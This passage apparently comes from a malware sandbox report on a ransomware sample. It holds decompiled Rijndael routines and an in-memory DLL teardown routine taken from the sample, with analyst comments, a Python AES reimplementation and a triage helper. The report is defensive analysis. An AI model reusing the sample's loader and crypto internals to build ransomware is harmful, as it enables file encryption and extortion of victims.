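def build_sample(orig_size: int, ciphertext: bytes, wrapped_key: bytes = b"\xaa" * 256) -> bytes:
    """Construct a synthetic container in the assumed layout (test data, not a real file)."""
    if len(wrapped_key) > 256:
        raise ValueError("wrapped key does not fit the 256-byte field")
    return HEADER.pack(MAGIC, len(wrapped_key), wrapped_key.ljust(256, b"\0"), 4, orig_size) + ciphertext
```

            A triage script can walk a share, call is_wncry on the first 8 bytes of each file, and use parse_wncry_header to recover the original sizes and the per-file wrapped keys without any decryption capability.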

            C-Code - Quality: 55%
            			// Rijndael block encryption for the generic block size. Object layout and
            			// control flow match CRijndael::EncryptBlock (the CodeProject CRijndael class):
            			//   +4     m_bKeyInit  -> throw exception(msg at 0x40f570) if no key was set
            			//   +0x3cc m_blockSize -> a 16-byte block is routed to the unrolled E00402E7E
            			//   +8     m_Ke[15][8] encryption round keys (32-byte stride per round)
            			//   +0x410 m_iROUNDS, +0x434 a[8] and +0x454 t[8] work buffers
            			//   0x40bc24 sm_shifts[SC][1..3][0] row offsets, SC = (Nb==4 ? 0 : Nb==6 ? 1 : 2)
            			//   0x408bfc..0x4097fc T1..T4 (256 ints each), 0x4089fc byte S-box
            			// The decompiler dropped the table indices inside the round expression (the
            			// "_v44 = 0" and bare "*0x00408FFC ^ *0x00408BFC" terms); the intended term is
            			// T1[t[i]>>24] ^ T2[(t[(i+s1)%Nb]>>16)&0xff] ^ T3[(t[(i+s2)%Nb]>>8)&0xff] ^ T4[t[(i+s3)%Nb]&0xff] ^ m_Ke[r][i].
            			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
            				signed int _v8;
            				signed int _v12;
            				signed char _v16;
            				signed int _v20;
            				intOrPtr _v24;
            				char _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				char _v56;
            				signed int _t150;
            				signed int _t151;
            				signed int _t155;
            				signed int* _t157;
            				signed char _t158;
            				intOrPtr _t219;
            				signed int _t230;
            				signed char* _t236;
            				signed char* _t237;
            				signed char* _t238;
            				signed char* _t239;
            				signed int* _t240;
            				signed char* _t242;
            				signed char* _t243;
            				signed char* _t245;
            				signed int _t260;
            				signed int* _t273;
            				signed int _t274;
            				void* _t275;
            				void* _t276;
            
            				_t275 = __ecx;
            				if( *((char*)(__ecx + 4)) == 0) {
            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
            					_push(0x40d570);
            					_push( &_v56);
            					L0040776E();
            				}
            				_t150 =  *(_t275 + 0x3cc);
            				if(_t150 == 0x10) {
            					return E00402E7E(_t275, _a4, _a8);
            				}
            				asm("cdq");
            				_t230 = 4;
            				_t151 = _t150 / _t230;
            				_t274 = _t151;
            				asm("sbb eax, eax");
            				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
            				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
            				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
            				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
            				_t157 = _t275 + 0x454;
            				if(_t274 > 0) {
            					_v16 = _t274;
            					_v8 = _t275 + 8;
            					_t242 = _a4;
            					do {
            						_t243 =  &(_t242[1]);
            						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
            						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
            						_t245 =  &(_t243[2]);
            						_t273 = _t157;
            						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
            						_v8 = _v8 + 4;
            						_t242 =  &(_t245[1]);
            						_t157 =  &(_t157[1]);
            						 *_t273 =  *_t273 ^  *_v8;
            						_t27 =  &_v16;
            						 *_t27 = _v16 - 1;
            					} while ( *_t27 != 0);
            				}
            				_t158 = 1;
            				_v16 = _t158;
            				if( *(_t275 + 0x410) > _t158) {
            					_v12 = _t275 + 0x28;
            					do {
            						if(_t274 > 0) {
            							_t34 =  &_v28; // 0x403b51
            							_t260 =  *_t34;
            							_v8 = _v12;
            							_a4 = _t260;
            							_v36 = _v24 - _t260;
            							_t240 = _t275 + 0x434;
            							_v40 = _v32 - _t260;
            							_v20 = _t274;
            							do {
            								asm("cdq");
            								_v44 = 0;
            								asm("cdq");
            								asm("cdq");
            								_v8 = _v8 + 4;
            								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
            								_t240 =  &(_t240[1]);
            								_a4 = _a4 + 1;
            								_t84 =  &_v20;
            								 *_t84 = _v20 - 1;
            							} while ( *_t84 != 0);
            						}
            						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
            						_v12 = _v12 + 0x20;
            						_t276 = _t276 + 0xc;
            						_v16 = _v16 + 1;
            						_t158 = _v16;
            					} while (_t158 <  *(_t275 + 0x410));
            				}
            				_v8 = _v8 & 0x00000000;
            				if(_t274 > 0) {
            					_t236 = _a8;
            					_t219 = _v24;
            					_a8 = _t275 + 0x454;
            					_t100 =  &_v28; // 0x403b51
            					_v44 =  *_t100 - _t219;
            					_v40 = _v32 - _t219;
            					do {
            						_a8 =  &(_a8[4]);
            						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
            						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
            						_t237 =  &(_t236[1]);
            						asm("cdq");
            						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
            						asm("cdq");
            						_t238 =  &(_t237[1]);
            						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
            						_t239 =  &(_t238[1]);
            						asm("cdq");
            						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
            						 *_t239 = _t158;
            						_t236 =  &(_t239[1]);
            						_v8 = _v8 + 1;
            						_t219 = _t219 + 1;
            					} while (_v8 < _t274);
            				}
            				return _t158;
            			}

            Instruction addresses for E0040350F (decompiler line map, collapsed): 0x00403517 to 0x00403794

            APIs
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ??0exception@@ExceptionThrowmemcpy
            • String ID: $Q;@
            • API String ID: 2382887404-262343263
            • Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
            • Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
            • Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
            • Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 54%
            			// Decryption counterpart of E0040350F (CRijndael::DecryptBlock): same
            			// structure, but it reads m_Kd at +0x1e8 (round 1 at +0x208), the inverse
            			// row offsets sm_shifts[SC][1..3][1] at 0x40bc28/0x40bc30/0x40bc38, the
            			// inverse T-tables T5..T8 at 0x409bfc..0x40a7fc and the inverse S-box bytes
            			// at 0x408afc. 16-byte blocks go to the unrolled E004031BC. As above, the
            			// table indices inside the round expression were lost by the decompiler.
            			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
            				signed int _v8;
            				signed int _v12;
            				signed char _v16;
            				signed int _v20;
            				intOrPtr _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				signed int _v44;
            				char _v56;
            				signed int _t150;
            				signed int _t151;
            				signed int _t155;
            				signed int* _t157;
            				signed char _t158;
            				intOrPtr _t219;
            				signed int _t230;
            				signed char* _t236;
            				signed char* _t237;
            				signed char* _t238;
            				signed char* _t239;
            				signed int* _t240;
            				signed char* _t242;
            				signed char* _t243;
            				signed char* _t245;
            				signed int _t260;
            				signed int* _t273;
            				signed int _t274;
            				void* _t275;
            				void* _t276;
            
            				_t275 = __ecx;
            				if( *((char*)(__ecx + 4)) == 0) {
            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
            					_push(0x40d570);
            					_push( &_v56);
            					L0040776E();
            				}
            				_t150 =  *(_t275 + 0x3cc);
            				if(_t150 == 0x10) {
            					return E004031BC(_t275, _a4, _a8);
            				}
            				asm("cdq");
            				_t230 = 4;
            				_t151 = _t150 / _t230;
            				_t274 = _t151;
            				asm("sbb eax, eax");
            				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
            				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
            				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
            				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
            				_t157 = _t275 + 0x454;
            				if(_t274 > 0) {
            					_v16 = _t274;
            					_v8 = _t275 + 0x1e8;
            					_t242 = _a4;
            					do {
            						_t243 =  &(_t242[1]);
            						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
            						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
            						_t245 =  &(_t243[2]);
            						_t273 = _t157;
            						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
            						_v8 = _v8 + 4;
            						_t242 =  &(_t245[1]);
            						_t157 =  &(_t157[1]);
            						 *_t273 =  *_t273 ^  *_v8;
            						_t27 =  &_v16;
            						 *_t27 = _v16 - 1;
            					} while ( *_t27 != 0);
            				}
            				_t158 = 1;
            				_v16 = _t158;
            				if( *(_t275 + 0x410) > _t158) {
            					_v12 = _t275 + 0x208;
            					do {
            						if(_t274 > 0) {
            							_t260 = _v28;
            							_v8 = _v12;
            							_a4 = _t260;
            							_v36 = _v24 - _t260;
            							_t240 = _t275 + 0x434;
            							_v40 = _v32 - _t260;
            							_v20 = _t274;
            							do {
            								asm("cdq");
            								_v44 = 0;
            								asm("cdq");
            								asm("cdq");
            								_v8 = _v8 + 4;
            								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
            								_t240 =  &(_t240[1]);
            								_a4 = _a4 + 1;
            								_t84 =  &_v20;
            								 *_t84 = _v20 - 1;
            							} while ( *_t84 != 0);
            						}
            						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
            						_v12 = _v12 + 0x20;
            						_t276 = _t276 + 0xc;
            						_v16 = _v16 + 1;
            						_t158 = _v16;
            					} while (_t158 <  *(_t275 + 0x410));
            				}
            				_v8 = _v8 & 0x00000000;
            				if(_t274 > 0) {
            					_t236 = _a8;
            					_t219 = _v24;
            					_a8 = _t275 + 0x454;
            					_v44 = _v28 - _t219;
            					_v40 = _v32 - _t219;
            					do {
            						_a8 =  &(_a8[4]);
            						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
            						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
            						_t237 =  &(_t236[1]);
            						asm("cdq");
            						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
            						asm("cdq");
            						_t238 =  &(_t237[1]);
            						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
            						_t239 =  &(_t238[1]);
            						asm("cdq");
            						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
            						 *_t239 = _t158;
            						_t236 =  &(_t239[1]);
            						_v8 = _v8 + 1;
            						_t219 = _t219 + 1;
            					} while (_v8 < _t274);
            				}
            				return _t158;
            			}

            Instruction addresses for E00403797 (decompiler line map, collapsed): 0x0040379f to 0x00403a25

            APIs
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ??0exception@@ExceptionThrowmemcpy
            • String ID:
            • API String ID: 2382887404-3916222277
            • Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
            • Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
            • Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
            • Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			// Teardown of an in-memory loaded PE. Field offsets and call sequence match
            			// MemoryFreeLibrary from Joachim Bauch's MemoryModule: +0 NT headers,
            			// +4 image base, +8/+0xc dependency handle array and count, +0x10
            			// initialized flag, +0x20 free callback, +0x2c freeLibrary callback,
            			// +0x30 userdata. If the DLL was initialized its entry point
            			// (OptionalHeader.AddressOfEntryPoint, +0x28 into the NT headers) is called
            			// with DLL_PROCESS_DETACH (0); then each dependency is released, the array
            			// freed, the image unmapped with MEM_RELEASE (0x8000) and the descriptor
            			// returned to the process heap.
            			E004029CC(void* _a4) {
            				void* _t17;
            				intOrPtr _t18;
            				intOrPtr _t23;
            				intOrPtr _t25;
            				signed int _t35;
            				void* _t37;
            
            				_t37 = _a4;
            				if(_t37 != 0) {
            					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
            						_t25 =  *((intOrPtr*)(_t37 + 4));
            						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
            					}
            					if( *(_t37 + 8) == 0) {
            						L9:
            						_t18 =  *((intOrPtr*)(_t37 + 4));
            						if(_t18 != 0) {
            							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
            						}
            						return HeapFree(GetProcessHeap(), 0, _t37);
            					} else {
            						_t35 = 0;
            						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
            							L8:
            							free( *(_t37 + 8));
            							goto L9;
            						} else {
            							goto L5;
            						}
            						do {
            							L5:
            							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
            							if(_t23 != 0) {
            								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
            							}
            							_t35 = _t35 + 1;
            						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
            						goto L8;
            					}
            				}
            				return _t17;
            			}

            Instruction addresses for E004029CC (decompiler line map, collapsed): 0x004029ce to 0x00402a45

            APIs
            • free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: Heap$FreeProcessfree
            • String ID:
            • API String ID: 3428986607-0
            • Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
            • Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
            • Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
            • Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 34%
            			// 16-byte (Nb = 4) fast path of E0040350F, i.e. CRijndael::DefEncryptBlock:
            			// the loops are unrolled into four state words (_v20, _v16, _v24, _v12 after
            			// the initial XOR with m_Ke[0] at +8..+0x14), rounds 1..Nr-1 run through the
            			// T-tables with the fixed row offsets 1, 2, 3, and the final round XORs
            			// m_Ke[Nr] (m_iROUNDS << 5 bytes into m_Ke) with the byte S-box at 0x4089fc.
            			// The "*0x00408FFC ^ *0x00408BFC ^ *0x004093FC" terms are T-table lookups
            			// whose indices the decompiler dropped; the "// 0x8bf9f759"-style annotations
            			// are the memory contents the decompiler read at that address in the dump,
            			// not constants in the code.
            			E00402E7E(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
            				signed int _v8;
            				void* _v9;
            				void* _v10;
            				void* _v11;
            				signed int _v12;
            				void* _v13;
            				void* _v14;
            				void* _v15;
            				signed int _v16;
            				void* _v17;
            				void* _v18;
            				void* _v19;
            				signed int _v20;
            				void* _v21;
            				void* _v22;
            				signed int _v24;
            				signed int _v28;
            				intOrPtr _v32;
            				char _v44;
            				signed char* _t151;
            				signed char* _t154;
            				signed char* _t155;
            				signed char* _t158;
            				signed char* _t159;
            				signed char* _t160;
            				signed char* _t162;
            				signed int _t166;
            				signed int _t167;
            				signed char* _t172;
            				signed int* _t245;
            				signed int _t262;
            				signed int _t263;
            				signed int _t278;
            				signed int _t279;
            				signed int _t289;
            				signed int _t303;
            				intOrPtr _t344;
            				void* _t345;
            				signed int _t346;
            
            				_t344 = __ecx;
            				_v32 = __ecx;
            				if( *((char*)(__ecx + 4)) == 0) {
            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
            					_push(0x40d570);
            					_push( &_v44);
            					L0040776E();
            				}
            				_t151 = _a4;
            				_t154 =  &(_t151[3]);
            				_t155 =  &(_t154[1]);
            				_t278 = (( *_t151 & 0x000000ff) << 0x00000018 | (_t151[1] & 0x000000ff) << 0x00000010 |  *_t154 & 0x000000ff) ^  *(_t344 + 8);
            				_v20 = _t278;
            				_t158 =  &(_t155[3]);
            				_t159 =  &(_t158[1]);
            				_t160 =  &(_t159[1]);
            				_v16 = ((_t154[1] & 0x000000ff) << 0x00000018 | (_t155[1] & 0x000000ff) << 0x00000010 |  *_t158 & 0x000000ff) ^  *(_t344 + 0xc);
            				_t162 =  &(_t160[2]);
            				_t163 =  &(_t162[1]);
            				_t262 = (( *_t159 & 0x000000ff) << 0x00000018 | ( *_t160 & 0x000000ff) << 0x00000010 |  *_t162 & 0x000000ff) ^  *(_t344 + 0x10);
            				_v24 = _t262;
            				_t166 =  *(_t344 + 0x410);
            				_v28 = _t166;
            				_v12 = ((_t162[1] & 0x000000ff) << 0x00000018 | (_t163[1] & 0x000000ff) << 0x00000010) ^  *(_t344 + 0x14);
            				if(_t166 > 1) {
            					_a4 = _t344 + 0x30;
            					_v8 = _t166 - 1;
            					do {
            						_t245 =  &(_a4[8]);
            						_a4 = _t245;
            						_v24 =  *0x00408FFC ^  *0x00408BFC ^  *0x004093FC ^  *(0x4097fc + (_v16 & 0x000000ff) * 4) ^  *_a4;
            						_v16 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_t278 & 0x000000ff) * 4) ^  *(_a4 - 4);
            						_v12 =  *0x00408BFC ^  *0x004093FC ^  *0x00408FFC ^  *(0x4097fc + (_t262 & 0x000000ff) * 4) ^  *(_t245 - 0x1c);
            						_t262 = _v24;
            						_v24 = _t262;
            						_t278 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_v12 & 0x000000ff) * 4) ^  *(_t245 - 0x28);
            						_t80 =  &_v8;
            						 *_t80 = _v8 - 1;
            						_v20 = _t278;
            					} while ( *_t80 != 0);
            					_t166 = _v28;
            					_t344 = _v32;
            				}
            				_t167 = _t166 << 5;
            				_t86 = _t344 + 8; // 0x8bf9f759
            				_t279 =  *(_t167 + _t86);
            				_t88 = _t344 + 8; // 0x40355c
            				_t345 = _t167 + _t88;
            				_v8 = _t279;
            				_t172 = _a8;
            				 *_t172 =  *0x004089FC ^ _t279 >> 0x00000018;
            				_t172[1] =  *0x004089FC ^ _t279 >> 0x00000010;
            				_t97 = _t262 + 0x4089fc; // 0x6bf27b77
            				_t172[2] =  *_t97 ^ _v8 >> 0x00000008;
            				_t172[3] =  *((_v12 & 0x000000ff) + 0x4089fc) ^ _v8;
            				_t104 = _t345 + 4; // 0x33c12bf8
            				_t289 =  *_t104;
            				_v8 = _t289;
            				_t172[4] =  *0x004089FC ^ _t289 >> 0x00000018;
            				_t172[5] =  *0x004089FC ^ _v8 >> 0x00000010;
            				_t172[6] =  *0x004089FC ^ _v8 >> 0x00000008;
            				_t172[7] =  *((_v20 & 0x000000ff) + 0x4089fc) ^ _v8;
            				_t121 = _t345 + 8; // 0x6ff83c9
            				_t303 =  *_t121;
            				_v8 = _t303;
            				_t172[8] =  *0x004089FC ^ _t303 >> 0x00000018;
            				_t172[9] =  *0x004089FC ^ _v8 >> 0x00000010;
            				_t172[0xa] =  *0x004089FC ^ _v8 >> 0x00000008;
            				_t263 = _t262 & 0x000000ff;
            				_t172[0xb] =  *((_v16 & 0x000000ff) + 0x4089fc) ^ _v8;
            				_t137 = _t345 + 0xc; // 0x41c1950f
            				_t346 =  *_t137;
            				_v8 = _t346;
            				_t172[0xc] =  *0x004089FC ^ _t346 >> 0x00000018;
            				_t172[0xd] =  *0x004089FC ^ _t346 >> 0x00000010;
            				_t172[0xe] =  *0x004089FC ^ _t346 >> 0x00000008;
            				_t148 = _t263 + 0x4089fc; // 0x6bf27b77
            				_t172[0xf] =  *_t148 ^ _v8;
            				return _t172;
            			}
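            To make the three loops of E0040350F concrete (and, through the Nb = 4 case, to show what the unrolled E00402E7E computes), here is the same algorithm in Python. This is an added example, not code from the sample or from the CRijndael class whose layout it matches: the tables are regenerated from the Rijndael definitions instead of being copied out of .rdata, decryption (E00403797) is not implemented, and the function names are mine. With a 16-byte block it is plain AES and is checked against the FIPS-197 Appendix C vectors; with 24- or 32-byte blocks it exercises the sm_shifts row offsets that only the generic path uses.

```python
import struct


def _make_tables():
    """Rebuild the byte S-box and the four 1 KiB encryption T-tables that the
    binary keeps in .rdata (0x4089fc and 0x408bfc..0x4097fc)."""
    alog = [1] * 256                              # antilog table, generator 0x03
    for i in range(1, 256):
        v = (alog[i - 1] << 1) ^ alog[i - 1]
        alog[i] = v ^ 0x11b if v & 0x100 else v
    log = [0] * 256
    for i in range(1, 255):
        log[alog[i]] = i

    def mul(a, b):                                # GF(2^8) multiply via log tables
        return 0 if a == 0 or b == 0 else alog[(log[a] + log[b]) % 255]

    sbox = []
    for x in range(256):
        v = r = 0 if x == 0 else alog[255 - log[x]]   # multiplicative inverse
        for _ in range(4):                            # affine map of the S-box
            v = ((v << 1) | (v >> 7)) & 0xff
            r ^= v
        sbox.append(r ^ 0x63)

    def ror(w, n):
        return ((w >> n) | (w << (32 - n))) & 0xffffffff

    # T1[x] = (2S, S, S, 3S) MSB first; T2..T4 are byte rotations of T1
    t1 = [(mul(s, 2) << 24) | (s << 16) | (s << 8) | mul(s, 3) for s in sbox]
    return sbox, t1, [ror(w, 8) for w in t1], [ror(w, 16) for w in t1], [ror(w, 24) for w in t1]


SBOX, T1, T2, T3, T4 = _make_tables()
RCON = [1]
while len(RCON) < 30:                             # sm_rcon[30]: successive doublings in GF(2^8)
    v = RCON[-1] << 1
    RCON.append(v ^ 0x11b if v & 0x100 else v)
# sm_shifts rows: (c1, c2, c3) row offsets for Nb = 4, 6, 8; the decompiled
# (Nb == 4 ? 0 : Nb == 6 ? 1 : 2) selects the same row
SHIFTS = {4: (1, 2, 3), 6: (1, 2, 3), 8: (1, 3, 4)}


def _sub_word(w):
    return (SBOX[w >> 24] << 24) | (SBOX[(w >> 16) & 0xff] << 16) | (SBOX[(w >> 8) & 0xff] << 8) | SBOX[w & 0xff]


def expand_key(key, block_size=16):
    """Rijndael key schedule: returns (rounds, Ke) where Ke[r][i] is the 32-bit
    round-key word the sample stores in m_Ke[r][i] (object offset 8)."""
    nk, nb = len(key) // 4, block_size // 4
    if nk not in (4, 6, 8) or nb not in (4, 6, 8):
        raise ValueError("key and block size must be 16, 24 or 32 bytes")
    rounds = max(nk, nb) + 6
    w = list(struct.unpack(f">{nk}I", key))
    for i in range(nk, nb * (rounds + 1)):
        tmp = w[i - 1]
        if i % nk == 0:                           # RotWord, SubWord, Rcon
            tmp = _sub_word(((tmp << 8) | (tmp >> 24)) & 0xffffffff) ^ (RCON[i // nk - 1] << 24)
        elif nk > 6 and i % nk == 4:
            tmp = _sub_word(tmp)
        w.append(w[i - nk] ^ tmp)
    return rounds, [w[r * nb:(r + 1) * nb] for r in range(rounds + 1)]


def encrypt_block(key, block):
    """One block, same three phases as E0040350F: load t[] XOR Ke[0], rounds
    1..Nr-1 through the T-tables into a[] then copied back to t[], and a final
    S-box round XOR Ke[Nr] written out byte by byte."""
    nb = len(block) // 4
    rounds, ke = expand_key(key, len(block))
    s1, s2, s3 = SHIFTS[nb]
    t = [struct.unpack_from(">I", block, 4 * i)[0] ^ ke[0][i] for i in range(nb)]
    for r in range(1, rounds):
        t = [T1[t[i] >> 24] ^ T2[(t[(i + s1) % nb] >> 16) & 0xff]
             ^ T3[(t[(i + s2) % nb] >> 8) & 0xff] ^ T4[t[(i + s3) % nb] & 0xff]
             ^ ke[r][i] for i in range(nb)]
    out = bytearray()
    for i in range(nb):
        tt = ke[rounds][i]
        out += bytes((SBOX[t[i] >> 24] ^ (tt >> 24),
                      SBOX[(t[(i + s1) % nb] >> 16) & 0xff] ^ ((tt >> 16) & 0xff),
                      SBOX[(t[(i + s2) % nb] >> 8) & 0xff] ^ ((tt >> 8) & 0xff),
                      SBOX[t[(i + s3) % nb] & 0xff] ^ (tt & 0xff)))
    return bytes(out)
```

            The practical value of the transcription is the round-count and table layout: the sample's m_Ke has 15 rounds of 8 words regardless of the sizes in use, so a recovered object dump holds the expanded key at +8 even when only the first 11 rounds of 4 words are meaningful for AES-128.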

            Instruction addresses for E00402E7E (decompiler line map, collapsed): 0x00402e85 to 0x004031b9

            APIs
            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402E98
            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402EA7
            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID: ??0exception@@ExceptionThrow
            • String ID:
            • API String ID: 941485209-0
            • Opcode ID: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
            • Instruction ID: 7c46eb61736c4a52f21da4615b0110659747632e7974af7727d2e67ead4b8ec0
            • Opcode Fuzzy Hash: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
            • Instruction Fuzzy Hash: 01B1AD75A081D99EDB05CFB989A04EAFFF2AF4E20474ED1E9C5C4AB313C5306505DB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 33%
            			E004031BC(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
            				signed int _v8;
            				void* _v9;
            				void* _v10;
            				void* _v11;
            				signed int _v12;
            				void* _v13;
            				void* _v14;
            				void* _v15;
            				signed int _v16;
            				void* _v17;
            				void* _v18;
            				void* _v19;
            				signed int _v20;
            				void* _v21;
            				void* _v22;
            				signed int _v24;
            				signed int _v28;
            				intOrPtr _v32;
